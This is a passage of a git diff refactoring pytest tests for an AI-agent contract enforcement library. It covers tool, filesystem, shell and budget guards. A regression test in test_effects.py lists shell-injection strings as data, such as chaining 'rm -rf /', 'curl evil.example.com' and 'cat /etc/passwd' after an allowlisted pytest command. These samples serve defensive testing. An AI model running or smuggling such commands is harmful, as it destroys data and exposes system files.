ResourceBudgets(max_duration_seconds=0.01) - tracker = BudgetTracker(budgets) - import time + def test_shell_command_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_shell_commands=1)) + tracker.record_shell_command() + with pytest.raises(BudgetExceededError, match="shell_commands"): + tracker.record_shell_command() + def test_duration_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_duration_seconds=0.01)) time.sleep(0.02) with pytest.raises(BudgetExceededError, match="duration_seconds"): tracker.check_duration() def test_snapshot(self) -> None: - budgets = ResourceBudgets(max_cost_usd=10.0) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=10.0)) tracker.add_cost(1.50) tracker.add_tokens(500) tracker.record_tool_call() - snap = tracker.snapshot() - assert snap.cost_usd == 1.50 - assert snap.tokens == 500 - assert snap.tool_calls == 1 - assert snap.elapsed_seconds >= 0 + tracker.record_shell_command() + snapshot = tracker.snapshot() + assert snapshot.cost_usd == 1.50 + assert snapshot.tokens == 500 + assert snapshot.tool_calls == 1 + assert snapshot.shell_commands == 1 + assert snapshot.elapsed_seconds >= 0 def test_cost_callback(self) -> None: cost_value = [0.0] @@ -71,37 +74,34 @@ def test_cost_callback(self) -> None: def get_cost() -> float: return cost_value[0] - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets, cost_callback=get_cost) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00), cost_callback=get_cost) cost_value[0] = 0.50 - tracker.check_all() # OK + tracker.check_all() cost_value[0] = 1.50 with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.check_all() def test_reset(self) -> None: - budgets = ResourceBudgets(max_tool_calls=5) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=5, max_shell_commands=5)) for _ in range(4): tracker.record_tool_call() + tracker.record_shell_command() 
tracker.reset() - snap = tracker.snapshot() - assert snap.tool_calls == 0 - assert snap.cost_usd == 0.0 + snapshot = tracker.snapshot() + assert snapshot.tool_calls == 0 + assert snapshot.shell_commands == 0 + assert snapshot.cost_usd == 0.0 def test_negative_cost_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_cost(-1.0) + BudgetTracker().add_cost(-1.0) def test_negative_tokens_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_tokens(-1) + BudgetTracker().add_tokens(-1) def test_thread_safety(self) -> None: - budgets = ResourceBudgets(max_tool_calls=10_000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=10_000)) errors: list = [] def call_many() -> None: @@ -112,13 +112,13 @@ def call_many() -> None: errors.append(True) threads = [threading.Thread(target=call_many) for _ in range(5)] - for t in threads: - t.start() - for t in threads: - t.join() + for thread in threads: + thread.start() + for thread in threads: + thread.join() - snap = tracker.snapshot() - assert snap.tool_calls == 5000 + assert not errors + assert tracker.snapshot().tool_calls == 5000 def test_budget_exceeded_error_fields(self) -> None: err = BudgetExceededError("cost_usd", 5.23, 5.00) diff --git a/tests/test_cli.py b/tests/test_cli.py index fda48bf..67338e9 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any, Dict @@ -13,112 +14,122 @@ @pytest.fixture -def runner(): +def runner() -> CliRunner: return CliRunner() @pytest.fixture def contract_file(tmp_path: Path, tier1_data: Dict[str, Any]) -> Path: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / "contract.yaml" + path.write_text(yaml.dump(tier1_data, 
sort_keys=False), encoding="utf-8") + return path class TestValidate: - def test_valid_contract(self, runner, contract_file) -> None: + def test_valid_contract(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file)]) assert result.exit_code == 0 assert "PASSED" in result.output + assert "Coding/build surfaces" in result.output - def test_valid_contract_json(self, runner, contract_file) -> None: + def test_valid_contract_json(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file), "--json-output"]) assert result.exit_code == 0 - import json data = json.loads(result.output) assert data["valid"] is True assert data["tier"] == 1 + assert data["coding_surfaces"]["filesystem_write"] == ["src/**", "tests/**"] - def test_invalid_contract(self, runner, tmp_path) -> None: + def test_invalid_contract(self, runner: CliRunner, tmp_path: Path) -> None: bad = tmp_path / "bad.yaml" bad.write_text(yaml.dump({"agent_contract": "bad"}, sort_keys=False), encoding="utf-8") result = runner.invoke(main, ["validate", str(bad)]) assert result.exit_code == 1 assert "FAILED" in result.output - def test_file_not_found(self, runner) -> None: - result = runner.invoke(main, ["validate", "/nonexistent.yaml"]) - assert result.exit_code != 0 - - def test_shows_recommendations(self, runner, tmp_path, tier0_data) -> None: - p = tmp_path / "tier0.yaml" - p.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") - result = runner.invoke(main, ["validate", str(p)]) + def test_shows_recommendations(self, runner: CliRunner, tmp_path: Path, tier0_data: Dict[str, Any]) -> None: + path = tmp_path / "tier0.yaml" + path.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") + result = runner.invoke(main, ["validate", str(path)]) assert result.exit_code == 0 assert "Recommendations" in result.output class TestCheckCompat: - def test_compatible(self, runner, 
contract_file) -> None: + def test_compatible(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file)]) assert result.exit_code == 0 - def test_json_output(self, runner, contract_file) -> None: + def test_json_output(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file), "-j"]) assert result.exit_code == 0 - import json - data = json.loads(result.output) - assert "compatible" in data + assert "compatible" in json.loads(result.output) class TestInit: - def test_template_generation(self, runner) -> None: + def test_template_generation(self, runner: CliRunner) -> None: result = runner.invoke(main, ["init", "--name", "test-agent"]) assert result.exit_code == 0 assert "test-agent" in result.output assert "postconditions" in result.output - def test_output_to_file(self, runner, tmp_path) -> None: + def test_coding_template_generation(self, runner: CliRunner) -> None: + result = runner.invoke(main, ["init", "--template", "coding"]) + assert result.exit_code == 0 + assert "filesystem:" in result.output + assert "run_artifact_path" in result.output + + def test_output_to_file(self, runner: CliRunner, tmp_path: Path) -> None: out = tmp_path / "generated.yaml" result = runner.invoke(main, ["init", "--name", "test", "-o", str(out)]) assert result.exit_code == 0 assert out.exists() - def test_from_trace(self, runner, tmp_path) -> None: + def test_from_trace(self, runner: CliRunner, tmp_path: Path) -> None: trace_file = tmp_path / "traces.jsonl" traces = [ - {"agent": {"name": "trace-agent", "version": "1.0.0"}, - "tool_calls": [{"name": "search"}, {"name": "database.read"}], - "usage": {"cost_usd": 0.05, "total_tokens": 500}, - "duration_seconds": 2.5}, + { + "agent": {"name": "trace-agent", "version": "1.0.0"}, + "tool_calls": [{"name": "search"}, {"name": "database.read"}], + "shell_commands": ["python -m 
pytest tests/test_app.py"], + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "usage": {"cost_usd": 0.05, "total_tokens": 500}, + "duration_seconds": 2.5, + }, ] - trace_file.write_text( - "\n".join(__import__("json").dumps(t) for t in traces), - encoding="utf-8", - ) + trace_file.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") result = runner.invoke(main, ["init", "--from-trace", str(trace_file)]) assert result.exit_code == 0 assert "trace-agent" in result.output - assert "search" in result.output + assert "filesystem" in result.output + assert "shell" in result.output + + +class TestCheckVerdict: + def test_pass(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "pass", "final_gate": "allowed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 0 + assert "Outcome: pass" in result.output + + def test_fail(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "fail", "final_gate": "failed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 1 class TestTestCommand: - def test_no_eval_suite(self, runner, contract_file) -> None: + def test_no_eval_suite(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["test", str(contract_file)]) assert result.exit_code == 0 assert "Postconditions" in result.output - def test_with_eval_suite(self, runner, contract_file, tmp_path) -> None: + def test_with_eval_suite(self, runner: CliRunner, contract_file: Path, tmp_path: Path) -> None: eval_dir = tmp_path / "evals" eval_dir.mkdir() eval_file = eval_dir / "basic.jsonl" - import json - cases = [ - {"output": {"status": "ok"}}, - {"output": None}, - ] - eval_file.write_text( - 
"\n".join(json.dumps(c) for c in cases), encoding="utf-8" - ) + eval_file.write_text("\n".join(json.dumps(c) for c in [{"output": {"status": "ok"}}, {"output": None}]), encoding="utf-8") result = runner.invoke(main, ["test", str(contract_file), "--eval-suite", str(eval_dir)]) - # At least one should pass (non-None output), one may fail assert "Results:" in result.output diff --git a/tests/test_composition.py b/tests/test_composition.py index a4c13d5..21821d0 100644 --- a/tests/test_composition.py +++ b/tests/test_composition.py @@ -20,7 +20,7 @@ def test_compatible_contracts(self, tmp_yaml, tier2_data: Dict[str, Any]) -> Non "authorized": {"tools": ["search"], "network": [], "state_writes": []}, "declared": {"tools": ["search"], "network": [], "state_writes": []}, }, - "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0}}, + "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0, "max_shell_commands": 3}}, "delegation": { "max_depth": 1, "allowed_agents": [], diff --git a/tests/test_effects.py b/tests/test_effects.py index 3a18848..f826bf4 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -7,64 +7,121 @@ from agent_contracts.effects import ( EffectDeniedError, EffectGuard, + ShellMetacharacterError, intersect_authorized, union_declared, validate_declared_subset, ) -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class TestEffectGuard: def test_no_config_allows_all(self) -> None: guard = EffectGuard() assert guard.check_tool("anything") is True + assert guard.check_file_read("secret.txt") is True + assert guard.check_shell_command("rm -rf /") is True assert not guard.is_configured def test_configured_allows_listed_tool(self) -> None: - auth = 
EffectsAuthorized(tools=["search", "database.read"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search", "database.read"])) assert guard.check_tool("search") is True assert guard.check_tool("database.read") is True def test_configured_denies_unlisted_tool(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) assert guard.check_tool("delete_all") is False def test_glob_pattern_matching(self) -> None: - auth = EffectsAuthorized(tools=["database.*", "api.user.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["database.*", "api.user.*"])) assert guard.check_tool("database.read") is True assert guard.check_tool("database.write") is True assert guard.check_tool("api.user.get") is True assert guard.check_tool("api.admin.delete") is False def test_require_tool_raises(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) with pytest.raises(EffectDeniedError, match="tool 'delete'"): guard.require_tool("delete") - def test_require_tool_passes(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) - guard.require_tool("search") # Should not raise - def test_network_check(self) -> None: - auth = EffectsAuthorized(network=["https://api.example.com/*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(network=["https://api.example.com/*"])) assert guard.check_network("https://api.example.com/search") is True assert guard.check_network("https://evil.com/data") is False def test_state_write_check(self) -> None: - auth = EffectsAuthorized(state_writes=["tickets.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(state_writes=["tickets.*"])) assert guard.check_state_write("tickets.status") is True assert guard.check_state_write("users.password") is False + def 
test_filesystem_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"])) + ) + assert guard.check_file_read("src/main.py") is True + assert guard.check_file_write("src/main.py") is True + assert guard.check_file_write("tests/test_main.py") is False + + def test_shell_command_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command("python -m pytest tests/test_app.py") is True + assert guard.check_shell_command("python -m mypy src") is False + + @pytest.mark.parametrize( + "command", + [ + "python -m pytest tests/ ; rm -rf /", + "python -m pytest tests/ && curl evil.example.com", + "python -m pytest tests/ || echo pwned", + "python -m pytest tests/ | cat /etc/passwd", + "python -m pytest tests/ > /etc/hosts", + "python -m pytest tests/ < /dev/urandom", + "python -m pytest tests/ >> /var/log/owned", + "python -m pytest $(echo tests)", + "python -m pytest `whoami`", + "python -m pytest tests/\nrm -rf /", + "python -m pytest tests/ &", + ], + ) + def test_shell_metacharacter_bypass_denied(self, command: str) -> None: + """Regression: fnmatch's `*` wildcard would otherwise consume shell + operators and let an attacker append payloads after an allowlisted + prefix. 
The strict reject must catch every chaining vector.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command(command) is False + with pytest.raises(ShellMetacharacterError) as exc_info: + guard.require_shell_command(command) + assert "metacharacter" in str(exc_info.value) + + def test_shell_metacharacter_error_is_effect_denied(self) -> None: + """ShellMetacharacterError must be catchable as EffectDeniedError so + existing handlers keep working.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + with pytest.raises(EffectDeniedError): + guard.require_shell_command("python -m pytest tests/ ; rm -rf /") + + def test_shell_metachar_introspection(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.shell_command_metachar("python -m pytest tests/") is None + assert guard.shell_command_metachar("python -m pytest a ; b") == ";" + assert guard.shell_command_metachar("python -m pytest $(b)") == "$(" + assert guard.shell_command_metachar("python -m pytest a\nb") == "\n" + def test_empty_allowlist_denies_all(self) -> None: - auth = EffectsAuthorized(tools=[], network=[], state_writes=[]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False assert guard.is_configured @@ -85,34 +142,38 @@ def test_glob_intersection(self) -> None: assert "database.write" in result.tools assert "admin.delete" not in result.tools - def test_empty_parent_denies_all(self) -> None: - parent = EffectsAuthorized(tools=[]) - child = EffectsAuthorized(tools=["search", "read"]) + def test_filesystem_and_shell_intersection(self) -> None: + parent = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"]), + shell=ShellAuthorization(commands=["python 
-m pytest *", "python -m ruff check *"]), + ) + child = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**", "tests/**"], write=["tests/**"]), + shell=ShellAuthorization(commands=["python -m pytest tests/*", "python -m mypy *"]), + ) result = intersect_authorized(parent, child) - assert result.tools == [] + assert result.filesystem is not None + assert result.filesystem.read == ["src/**"] + assert result.filesystem.write == [] + assert result.shell is not None + assert result.shell.commands == ["python -m pytest tests/*"] class TestUnionDeclared: def test_basic_union(self) -> None: - a = EffectsDeclared(tools=["search"], network=["https://a.com"]) - b = EffectsDeclared(tools=["write"], network=["https://b.com"]) - result = union_declared(a, b) + result = union_declared( + EffectsDeclared(tools=["search"], network=["https://a.com"]), + EffectsDeclared(tools=["write"], network=["https://b.com"]), + ) assert set(result.tools) == {"search", "write"} assert set(result.network) == {"https://a.com", "https://b.com"} - def test_deduplication(self) -> None: - a = EffectsDeclared(tools=["search", "read"]) - b = EffectsDeclared(tools=["search", "write"]) - result = union_declared(a, b) - assert result.tools == ["search", "read", "write"] - class TestValidateDeclaredSubset: def test_valid_subset(self) -> None: declared = EffectsDeclared(tools=["search"]) authorized = EffectsAuthorized(tools=["search", "database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] + assert validate_declared_subset(declared, authorized) == [] def test_invalid_tool(self) -> None: declared = EffectsDeclared(tools=["search", "delete_all"]) @@ -120,9 +181,3 @@ def test_invalid_tool(self) -> None: violations = validate_declared_subset(declared, authorized) assert len(violations) == 1 assert "delete_all" in violations[0] - - def test_glob_matching(self) -> None: - declared = EffectsDeclared(tools=["database.read"]) - authorized = 
EffectsAuthorized(tools=["database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] diff --git a/tests/test_enforcer.py b/tests/test_enforcer.py index a707893..1c45a0e 100644 --- a/tests/test_enforcer.py +++ b/tests/test_enforcer.py @@ -2,96 +2,160 @@ from __future__ import annotations +import json +from pathlib import Path from typing import Any, Dict import pytest -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + enforce_contract, + load_verdict_artifact, +) from agent_contracts.loader import load_contract +from agent_contracts.postconditions import PostconditionError @pytest.fixture def enforcer_tier1(tmp_yaml, tier1_data: Dict[str, Any]): - """ContractEnforcer with a Tier 1 contract.""" - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) return ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) +@pytest.fixture +def coding_contract_data() -> Dict[str, Any]: + return { + "agent_contract": "0.1.0", + "identity": {"name": "repo-build-agent", "version": "0.1.0"}, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + "effects": { + "authorized": { + "tools": [], + "network": [], + "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**"], + }, + "shell": {"commands": ["python -m pytest *"]}, + } + }, + "resources": {"budgets": {"max_shell_commands": 1}}, + "observability": {"run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json"}, + } + + class TestContractEnforcer: def test_authorized_tool_passes(self, enforcer_tier1) -> None: - enforcer_tier1.check_tool_call("search") # In 
allowlist + enforcer_tier1.check_tool_call("search") def test_unauthorized_tool_raises(self, enforcer_tier1) -> None: with pytest.raises(ContractViolation, match="not authorized"): enforcer_tier1.check_tool_call("delete_everything") - def test_tool_call_budget(self, tmp_yaml, tier1_data) -> None: - tier1_data["resources"]["budgets"]["max_tool_calls"] = 2 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("search") - enforcer.check_tool_call("database.read") - with pytest.raises(ContractViolation, match="tool_calls"): - enforcer.check_tool_call("search") + def test_file_write_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract_path = tmp_yaml(coding_contract_data) + contract = load_contract(contract_path) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="File write"): + enforcer.check_file_write("tests/test_app.py") + verdict = enforcer.finalize_run() + assert verdict.outcome == "blocked" + assert Path(verdict.artifacts["verdict_path"]).exists() + loaded = load_verdict_artifact(verdict.artifacts["verdict_path"]) + assert loaded["outcome"] == "blocked" + + def test_shell_command_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="Shell command"): + enforcer.check_shell_command("python -m mypy src") + assert enforcer.finalize_run().outcome == "blocked" + + def test_shell_command_budget(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.check_shell_command("python -m pytest tests/test_app.py") + with 
pytest.raises(ContractViolation, match="shell_commands"): + enforcer.check_shell_command("python -m pytest tests/test_other.py") + + def test_fail_verdict_when_required_checks_fail(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "fail", exit_code=1) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "fail" + assert verdict.final_gate == "failed" + assert any(v["violated_clause"] == "contract.postconditions.repo_checks_green" for v in verdict.violations) + + def test_pass_verdict_writes_artifact(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "pass" + verdict_path = Path(verdict.artifacts["verdict_path"]) + assert verdict_path.exists() + payload = json.loads(verdict_path.read_text(encoding="utf-8")) + assert payload["final_gate"] == "allowed" + assert payload["budgets"]["shell_commands"] == 0 def test_cost_budget(self, enforcer_tier1) -> None: enforcer_tier1.add_cost(0.30) enforcer_tier1.add_cost(0.15) with pytest.raises(ContractViolation, match="cost_usd"): - enforcer_tier1.add_cost(0.10) # Total 0.55 > 0.50 limit + enforcer_tier1.add_cost(0.10) def test_token_budget(self, tmp_yaml, tier1_data) -> None: tier1_data["resources"]["budgets"]["max_tokens"] = 1000 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) + enforcer = 
ContractEnforcer(load_contract(tmp_yaml(tier1_data)), violation_destination="callback", violation_callback=lambda e: None) enforcer.add_tokens(800) with pytest.raises(ContractViolation, match="tokens"): enforcer.add_tokens(300) def test_input_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": "hello"}) - assert errors == [] + assert enforcer_tier1.validate_input({"query": "hello"}) == [] def test_input_validation_failure(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": 123}) # Should be string - assert len(errors) > 0 + assert enforcer_tier1.validate_input({"query": 123}) def test_output_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_output({"result": "answer"}) - assert errors == [] - - def test_postcondition_evaluation(self, enforcer_tier1) -> None: - results = enforcer_tier1.evaluate_postconditions({"status": "ok"}) - assert len(results) == 1 - assert results[0].passed is True + assert enforcer_tier1.validate_output({"result": "answer"}) == [] def test_violations_accumulated(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) events = [] - enforcer = ContractEnforcer( - contract, violation_destination="callback", violation_callback=lambda e: events.append(e) - ) - try: + enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: events.append(e)) + with pytest.raises(ContractViolation): enforcer.check_tool_call("unauthorized_tool") - except ContractViolation: - pass assert len(enforcer.violations) == 1 + assert len(events) == 1 - def test_context_manager(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) - with ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) as enforcer: - enforcer.check_tool_call("search") + def 
test_context_manager_finalizes(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + with ContractEnforcer(contract, repo_root=tmp_path) as enforcer: + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + enforcer.finalize_run(output={"status": "done"}) + assert enforcer.artifact_path is not None + assert enforcer.artifact_path.exists() def test_no_effects_allows_all(self, tmp_yaml, tier0_data) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("anything") # No effects configured = allow all + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier0_data)), violation_destination="callback", violation_callback=lambda e: None) + enforcer.check_tool_call("anything") class TestEnforceContractDecorator: @@ -102,8 +166,7 @@ def test_decorator_basic(self, tmp_yaml, tier0_data) -> None: def my_agent(query: str, _enforcer: Any = None) -> str: return "result" - result = my_agent("hello") - assert result == "result" + assert my_agent("hello") == "result" def test_decorator_postcondition_fail(self, tmp_yaml) -> None: data = { @@ -121,7 +184,5 @@ def test_decorator_postcondition_fail(self, tmp_yaml) -> None: def bad_agent(query: str, _enforcer: Any = None) -> None: return None - from agent_contracts.postconditions import PostconditionError - with pytest.raises(PostconditionError): bad_agent("hello") diff --git a/tests/test_init_from_trace.py b/tests/test_init_from_trace.py index d7a8e0f..66b7dcb 100644 --- a/tests/test_init_from_trace.py +++ b/tests/test_init_from_trace.py @@ -7,71 +7,72 @@ import yaml -from agent_contracts.init_from_trace import ( - generate_contract_from_traces, - generate_contract_yaml, -) +from agent_contracts.init_from_trace import generate_contract_from_traces, 
generate_contract_yaml class TestGenerateFromTraces: def _write_traces(self, tmp_path: Path, traces: list) -> Path: - p = tmp_path / "traces.jsonl" - p.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") - return p + path = tmp_path / "traces.jsonl" + path.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") + return path def test_extracts_tools(self, tmp_path: Path) -> None: traces = [ {"tool_calls": [{"name": "search"}, {"name": "database.read"}]}, {"tool_calls": [{"name": "search"}, {"name": "api.call"}]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) tools = result["effects"]["authorized"]["tools"] assert "search" in tools assert "database.read" in tools assert "api.call" in tools + def test_extracts_filesystem_and_shell(self, tmp_path: Path) -> None: + traces = [ + { + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "shell_commands": ["python -m pytest tests/test_app.py"], + } + ] + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) + authorized = result["effects"]["authorized"] + assert authorized["filesystem"]["read"] == ["src/**"] + assert authorized["filesystem"]["write"] == ["tests/**"] + assert authorized["shell"]["commands"] == ["python -m pytest tests/test_app.py"] + def test_extracts_budgets(self, tmp_path: Path) -> None: traces = [ - {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, - "tool_calls": [{"name": "a"}, {"name": "b"}]}, - {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, - "tool_calls": [{"name": "a"}]}, + {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, "tool_calls": [{"name": "a"}, {"name": "b"}], "shell_commands": ["pytest"]}, + {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, "tool_calls": [{"name": "a"}], 
"shell_commands": ["pytest", "ruff"]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) budgets = result["resources"]["budgets"] - assert budgets["max_cost_usd"] == 0.24 # 0.20 * 1.2 - assert budgets["max_tokens"] == 2400 # 2000 * 1.2 + assert budgets["max_cost_usd"] == 0.24 + assert budgets["max_tokens"] == 2400 + assert budgets["max_shell_commands"] == 3 def test_extracts_identity(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "my-agent", "version": "2.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) assert result["identity"]["name"] == "my-agent" assert result["identity"]["version"] == "2.0.0" def test_name_override(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "original", "version": "1.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path, agent_name="override") + result = generate_contract_from_traces(self._write_traces(tmp_path, traces), agent_name="override") assert result["identity"]["name"] == "override" def test_always_has_postcondition(self, tmp_path: Path) -> None: - traces = [{"tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [{"tool_calls": []}])) assert len(result["contract"]["postconditions"]) >= 1 def test_yaml_output(self, tmp_path: Path) -> None: traces = [{"tool_calls": [{"name": "search"}], "usage": {"cost_usd": 0.01, "total_tokens": 100}}] - path = self._write_traces(tmp_path, traces) - yaml_str = generate_contract_yaml(path) - parsed = yaml.safe_load(yaml_str) + parsed = yaml.safe_load(generate_contract_yaml(self._write_traces(tmp_path, traces))) assert 
parsed["agent_contract"] == "0.1.0" + assert parsed["observability"]["run_artifact_path"] == ".agent-contracts/runs/{run_id}/verdict.json" def test_empty_traces(self, tmp_path: Path) -> None: - path = self._write_traces(tmp_path, []) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [])) assert result["identity"]["name"] == "unnamed-agent" - assert "effects" not in result # No tools observed + assert "effects" in result diff --git a/tests/test_loader.py b/tests/test_loader.py index cce2715..3078524 100644 --- a/tests/test_loader.py +++ b/tests/test_loader.py @@ -40,16 +40,13 @@ def test_non_mapping_yaml(self, tmp_path: Path) -> None: class TestValidateContract: def test_valid_tier0(self, tier0_data: Dict[str, Any]) -> None: - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] def test_valid_tier1(self, tier1_data: Dict[str, Any]) -> None: - errors = validate_contract(tier1_data) - assert errors == [] + assert validate_contract(tier1_data) == [] def test_valid_tier2(self, tier2_data: Dict[str, Any]) -> None: - errors = 